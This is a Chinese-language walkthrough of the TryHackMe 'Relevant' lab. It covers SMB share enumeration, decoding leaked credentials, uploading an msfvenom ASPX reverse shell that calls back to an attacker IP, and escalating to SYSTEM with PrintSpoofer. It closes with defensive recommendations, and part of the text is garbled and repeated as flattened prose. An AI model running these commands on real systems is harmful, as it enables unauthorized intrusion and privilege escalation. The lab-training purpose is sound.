tryhackme-Relevant
字数 1137 2025-08-10 19:49:08

TryHackMe-Relevant 渗透测试实战教学文档

1. 目标信息收集

1.1 初始端口扫描

使用Nmap进行快速端口扫描,识别开放服务:

nmap -p1-65535 --min-rate=5000 10.10.101.177

扫描结果

  • 开放端口:80 (HTTP), 135 (MSRPC), 139 (NetBIOS), 445 (SMB), 3389 (RDP), 5985 (WinRM), 49663, 49667, 49669

1.2 详细服务扫描

获取更详细的服务信息:

nmap -sV -sC -p80,135,139,445,3389,5985,49663,49667,49669 10.10.101.177

2. SMB服务枚举

2.1 列出SMB共享

smbclient -L 10.10.101.177

发现共享nt4wrksv

2.2 连接共享并枚举内容

smbclient \\\\10.10.101.177\\nt4wrksv

发现文件passwords.txt

2.3 下载并分析密码文件

获取文件内容:

Qm9iIC0gIVBAJCRXMHJEITEyMw==
QmlsbCAtIEp1dzRubmFNNG40MjA2OTY5NjkhJCQk

使用Base64解码:

echo "Qm9iIC0gIVBAJCRXMHJEITEyMw==" | base64 -d
echo "QmlsbCAtIEp1dzRubmFNNG40MjA2OTY5NjkhJCQk" | base64 -d

解码结果

  • Bob - !P@

\[W0rD!123 - Bill - Juw4nnaM4n420696969! \]

$

3. Web服务枚举

3.1 目录暴力破解

对49663端口的IIS服务进行目录枚举:

gobuster dir -u http://10.10.101.177:49663/ -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -s '200,301' -t 50

发现目录/nt4wksv

3.2 验证目录关联

访问http://10.10.101.177:49663/nt4wrksv/passwords.txt,确认与SMB共享中的文件相同。

4. 漏洞利用

4.1 生成ASPX反向Shell

使用msfvenom生成payload:

msfvenom -p windows/x64/shell_reverse_tcp lhost=10.10.5.241 lport=4433 -f aspx > 1.aspx

4.2 上传WebShell

通过SMB上传文件:

smbclient \\\\10.10.101.177\\nt4wrksv
put 1.aspx

4.3 触发WebShell

访问上传的WebShell:

curl http://10.10.8.87:49663/nt4wrksv/1.aspx

注意:靶机IP可能变化,需根据实际情况调整。

5. 权限提升

5.1 检查当前权限

whoami /priv

关键发现:启用了SeImpersonatePrivilege令牌

5.2 提权方法一:Meterpreter

  1. 生成Meterpreter payload
  2. 上传并执行
  3. 使用getsystem提权

5.3 提权方法二:PrintSpoofer

  1. 下载PrintSpoofer64.exe:
wget https://github.com/itm4n/PrintSpoofer/releases/download/v1.0/PrintSpoofer64.exe
  1. 设置SMB共享:
smbserver.py a /root
  1. 在靶机执行:
\\10.10.169.251\a\PrintSpoofer64.exe

5.4 提权方法三:直接上传执行

  1. 上传PrintSpoofer64.exe到靶机
  2. 执行:
PrintSpoofer64.exe -i -c cmd

6. 获取Flag

  • 用户flag:user.txt
  • 系统flag:root.txt

关键点总结

  1. SMB共享枚举是Windows系统渗透的重要入口点
  2. IIS与SMB目录共享的关联性发现是突破关键
  3. SeImpersonatePrivilege是Windows提权的常见突破口
  4. PrintSpoofer是替代Juicy Potato的有效提权工具
  5. 多方法提权确保渗透测试成功率

防御建议

  1. 限制SMB共享的匿名访问权限
  2. IIS目录不应与SMB共享目录重叠
  3. 及时更新系统补丁,修复特权提升漏洞
  4. 监控异常文件上传行为
  5. 最小化用户特权分配
TryHackMe-Relevant 渗透测试实战教学文档 1. 目标信息收集 1.1 初始端口扫描 使用Nmap进行快速端口扫描,识别开放服务: 扫描结果 : 开放端口:80 (HTTP), 135 (MSRPC), 139 (NetBIOS), 445 (SMB), 3389 (RDP), 5985 (WinRM), 49663, 49667, 49669 1.2 详细服务扫描 获取更详细的服务信息: 2. SMB服务枚举 2.1 列出SMB共享 发现共享 : nt4wrksv 2.2 连接共享并枚举内容 发现文件 : passwords.txt 2.3 下载并分析密码文件 获取文件内容: 使用Base64解码: 解码结果 : Bob - !P@$$W0rD !123 Bill - Juw4nnaM4n420696969 !$$$ 3. Web服务枚举 3.1 目录暴力破解 对49663端口的IIS服务进行目录枚举: 发现目录 : /nt4wksv 3.2 验证目录关联 访问 http://10.10.101.177:49663/nt4wrksv/passwords.txt ,确认与SMB共享中的文件相同。 4. 漏洞利用 4.1 生成ASPX反向Shell 使用msfvenom生成payload: 4.2 上传WebShell 通过SMB上传文件: 4.3 触发WebShell 访问上传的WebShell: 注意 :靶机IP可能变化,需根据实际情况调整。 5. 权限提升 5.1 检查当前权限 关键发现 :启用了 SeImpersonatePrivilege 令牌 5.2 提权方法一:Meterpreter 生成Meterpreter payload 上传并执行 使用 getsystem 提权 5.3 提权方法二:PrintSpoofer 下载PrintSpoofer64.exe: 设置SMB共享: 在靶机执行: 5.4 提权方法三:直接上传执行 上传PrintSpoofer64.exe到靶机 执行: 6. 获取Flag 用户flag: user.txt 系统flag: root.txt 关键点总结 SMB共享枚举 是Windows系统渗透的重要入口点 IIS与SMB目录共享 的关联性发现是突破关键 SeImpersonatePrivilege 是Windows提权的常见突破口 PrintSpoofer 是替代Juicy Potato的有效提权工具 多方法提权确保渗透测试成功率 防御建议 限制SMB共享的匿名访问权限 IIS目录不应与SMB共享目录重叠 及时更新系统补丁,修复特权提升漏洞 监控异常文件上传行为 最小化用户特权分配